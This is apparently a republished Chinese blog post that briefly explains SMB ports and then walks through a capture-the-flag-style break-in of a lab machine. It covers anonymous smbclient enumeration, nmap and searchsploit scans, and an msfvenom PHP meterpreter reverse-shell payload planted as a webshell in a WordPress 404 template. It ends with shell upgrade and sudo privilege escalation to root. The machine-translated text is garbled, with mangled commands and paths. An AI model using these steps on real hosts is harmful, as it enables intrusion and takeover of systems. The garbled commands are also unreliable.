什么是SMB协议?与FTP协议有什么不同?,SMB协议端口
SMB(ServerMessage Block)通信协议是微软和英特尔在1987年制定的。主要用作微软网络的通信协议。
端口139(TCP)-文件和打印共享;Smbd(基于SMB(服务器消息端口445 (TCP)-NetBIOS服务在windos 2000及更高版本中使用该端口,(CIFS,是SMB协议扩展到互联网后的互联网文件共享块)协议,主要用于局域网,文件共享协议)
39和445是smb协议。
306开发mysql服务
1对于smb协议,请使用空白密码。
smbclient -L ip
smbclient \\ip\$share
Ipc是一个空文件,打印机没有访问它的权限。
获取敏感文件
-gedit是Linux环境下的文本编辑器,类似于windows中的写字板程序。不需要特别复杂的编程环境,更适合作为基本的文本编辑器。
306端口开放mysql服务
不允许远程登录mysql。
然后通过ssh协议登录主机。
2分析smb协议的远程溢出漏洞
Searchsploit samba版本号
nmap -A -v -T4
查找samba版本号
根据http协议漏洞分析
用浏览器查网站,用Dirb和Nikto检测,找到突破点,后台登录目标,上传webshell。
迪拉姆http://192
==目录:http://192 . 168 . 1 . 108/WordPress/WP-admin/
登录后台。
制作webshell
MSF venom-p PHP/meter preter/reverse _ tcplhost=攻击机IP port=4444-f raw/root/destktop/shell . PHP
做一个。exe文件,然后将其发送到目标机器Windows。运行后,可以使用msfconsole连接msfvenom服务来控制kali linux上的目标机器。
进入控制台
输入run,然后打开网页并点击外观编辑器404模板。
将shell.php文件中的代码复制到404,上传成功后会显示出来。
然后通过固定路径http://射击场IP/WordPress/WP-content/themes/twenty fifth/404 . PHP访问webshell。
然后输入的id反弹回shell。
下一步也一样,优化终端(python-c " import pty;Pty.spawn(/滑稽外套/巴什) ")
使用cat /etc/passwd/检查当前系统的其他用户名(注意主目录)并查找togie用户。su togie切换到togie目录,密码用之前找到的12345成功登录。
或者切换到root权限,使用sudo -l查看苏灿执行什么操作,然后使用sudo su提升权限。
最后在root找到proof.txt。
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。